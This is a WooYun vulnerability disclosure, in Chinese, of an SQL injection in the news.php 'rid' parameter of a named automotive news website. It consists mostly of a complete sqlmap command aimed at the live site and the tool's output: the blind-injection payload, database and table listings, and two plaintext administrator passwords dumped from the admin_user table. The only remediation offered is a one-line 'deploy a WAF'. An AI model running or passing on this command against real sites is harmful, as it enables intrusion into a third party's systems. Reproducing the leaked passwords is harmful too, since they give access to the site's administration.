当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158870

漏洞标题:时代车网主站存在SQL注射漏洞(管理密码)

相关厂商:时代车网

漏洞作者: 路人甲

提交时间:2015-12-07 11:48

修复时间:2016-01-21 11:50

公开时间:2016-01-21 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

时代车网 是由北京振兴时代汽车文化传媒有限公司主办的大型综合性汽车行业网站。
“网络天下车商,共兴汽车社会”是时代车网的发展目标。
“以内容为本,为客户提供有价值的服务”,是时代车网的办网宗旨。
时代车网的宣传内容,既有立意高远具有权威性、指导性的宏观分析;又有立足于市场,满足汽车厂商和广大汽车消费者的各类信息;还有体现现代汽车风尚的娱悦文化。内容广泛,风格时尚,快捷实用。
时代车网愿与您携手共建和谐、健康的汽车社会!

详细说明:

地址:http://www.cnautotime.cn/news.php?rid=239

$ python sqlmap.py -u "http://www.cnautotime.cn/news.php?rid=23039" -p rid --technique=B --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: s562526db0
Table: admin_user
[2 entries]
+-----------+
| password |
+-----------+
| adcd#@min |
| ayminpp3 |
+-----------+

漏洞证明:

---
Parameter: rid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: rid=23039 AND 5320=5320
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 's562526db0@localhost'
current user is DBA: False
database management system users [1]:
[*] 's562526db0'@'localhost'
Database: s562526db0
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| news_info | 23316 |
| sort | 183 |
| ad_pic | 151 |
| sys_column | 147 |
| car_info | 137 |
| car_pic | 126 |
| feed_back | 92 |
| ad_info | 85 |
| car_sort | 56 |
| car_sort_pic | 30 |
| ad_sort | 22 |
| news_pic | 19 |
| confirm_code | 10 |
| sort_pic | 9 |
| select_from | 8 |
| pdf_info | 4 |
| admin_user | 2 |
| car_feed_back | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 544 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| STATISTICS | 49 |
| PARTITIONS | 47 |
| TABLES | 47 |
| CHARACTER_SETS | 36 |
| KEY_COLUMN_USAGE | 19 |
| TABLE_CONSTRAINTS | 19 |
| SCHEMA_PRIVILEGES | 15 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: s562526db0
Table: admin_user
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: s562526db0
Table: admin_user
[2 entries]
+-----------+
| password |
+-----------+
| adcd#@min |
| ayminpp3 |
+-----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝